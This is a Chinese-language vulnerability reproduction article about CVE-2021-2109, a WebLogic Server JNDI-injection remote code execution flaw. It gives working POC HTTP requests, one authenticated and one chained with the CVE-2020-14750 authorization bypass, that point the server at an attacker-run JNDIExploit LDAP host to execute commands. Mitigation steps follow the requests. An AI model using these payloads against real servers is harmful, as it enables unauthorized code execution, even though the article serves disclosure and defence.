CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

admin 2023年1月8日22:52:41安全文章评论17 views1729字阅读5分45秒阅读模式


01


风险概述


2021年1月Oracle发布了安全更新补丁,包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了,2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新,及此公告中的其他补丁。CVE编号CVE-2021-2109,该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

影响版本如下:

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

WeblogicServer 14.1.1.0.0


02



漏洞复现


一、验证环境

使用DOCKER搭建Weblogic Server测试环境,Weblogic Server可以正常访问

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

二、复现1:正常登录后台的情况下进行JNDI注入

1、需要利用管理员帐号登录Weblogic Server后台,通过BurpSuite抓取登录数据包,获取登录Cookie数据

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

2、在本机启动启动LDAP,可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载,命令如下:

java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

3. 发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

4.验证测试:通过cmd变量执行ipconfig系统命令

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

二、复现2:未授权访问后台进行JNDI注入

实现需要目标系统同时存在Weblogic Server CVE-2020-14750未授权访问漏洞。

1、发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

2. 通过cmd变量执行calc.exe,打开系统计算器

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

3.验证测试:打开系统计算器。

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案



03



排查方法


联研院工具箱支持CVE-2021-2109 Weblogic Server远程代码执行漏洞扫描。

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案


04



解决方案


一、禁用T3协议

如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。

1)进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。

2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。

二、禁止启用IIOP

登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效。

三、临时关闭后台/console/console.portal对外访问

四、升级官方安全补丁

原文始发于微信公众号(国网公司网络安全实验室):CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日22:52:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2021-2109 Weblogic Server远程代码执行漏洞复现分析及联研院工具箱排查解决方案 http://cn-sec.com/archives/1038503.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: